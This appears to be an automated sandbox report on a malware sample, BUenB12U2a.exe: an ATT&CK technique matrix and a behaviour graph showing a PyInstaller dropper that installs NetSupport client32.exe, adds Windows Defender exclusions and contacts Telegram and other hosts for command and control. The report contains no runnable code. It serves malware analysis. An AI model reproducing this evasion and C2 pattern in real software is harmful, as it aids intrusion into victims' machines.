| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 13 Process Injection | 1 Software Packing | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 11 Non-Standard Port | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 141 Security Software Discovery | SSH | Keylogging | 5 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | 6 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Access Token Manipulation | Network Sniffing | 2 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 13 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
Behavior Graph ID: 1621635 Sample: BUenB12U2a.exe Startdate: 22/02/2025 Architecture: WINDOWS Score: 92

Top level:
- DNS/IP: api.telegram.org
  - signature: Uses the Telegram API (likely for C&C communication)
- DNS/IP: geo.netsupportsoftware.com
- DNS/IP: api.ipify.org
- signature: Suricata IDS alerts for network traffic
- signature: Multi AV Scanner detection for submitted file
- signature: Uses known network protocols on non-standard ports
- 2 other signatures
- started: BUenB12U2a.exe 89
- started: client32.exe
- started: client32.exe

BUenB12U2a.exe 89:
- dropped: C:\Users\user\AppData\...\unicodedata.pyd, PE32+
- dropped: C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+
- dropped: C:\Users\user\AppData\Local\...\select.pyd, PE32+
- dropped: 66 other files (none is malicious)
- signature: Adds a directory exclusion to Windows Defender
- signature: Found pyInstaller with non standard icon
- started: BUenB12U2a.exe 1 14

BUenB12U2a.exe 1 14:
- DNS/IP: api.telegram.org 149.154.167.220, 443, 49744 TELEGRAMRU United Kingdom
- DNS/IP: 147.45.198.181, 49732, 80 FREE-NET-ASFREEnetEU Russian Federation
- DNS/IP: api.ipify.org 172.67.74.152, 443, 49743 CLOUDFLARENETUS United States
- dropped: C:\Users\user\AppData\...\client32.exe, PE32
- dropped: C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32
- dropped: C:\Users\user\AppData\...\msvcr100.dll, PE32
- dropped: 5 other files (none is malicious)
- signature: Adds a directory exclusion to Windows Defender
- started: cmd.exe 1
  - started: client32.exe 16
    - DNS/IP: 64.190.113.159, 1488, 49733 TRAVELCLICKCORP1US United States
    - DNS/IP: geo.netsupportsoftware.com 104.26.1.231, 49734, 49735, 49736 CLOUDFLARENETUS United States
    - signature: Contains functionalty to change the wallpaper
    - signature: Contains functionality to detect sleep reduction / modifications
  - started: conhost.exe
- started: powershell.exe 23
  - signature: Loading BitLocker PowerShell Module
  - started: conhost.exe
  - started: WmiPrvSE.exe
- started: cmd.exe 1
  - started: conhost.exe
- started: WMIC.exe 1
  - started: conhost.exe
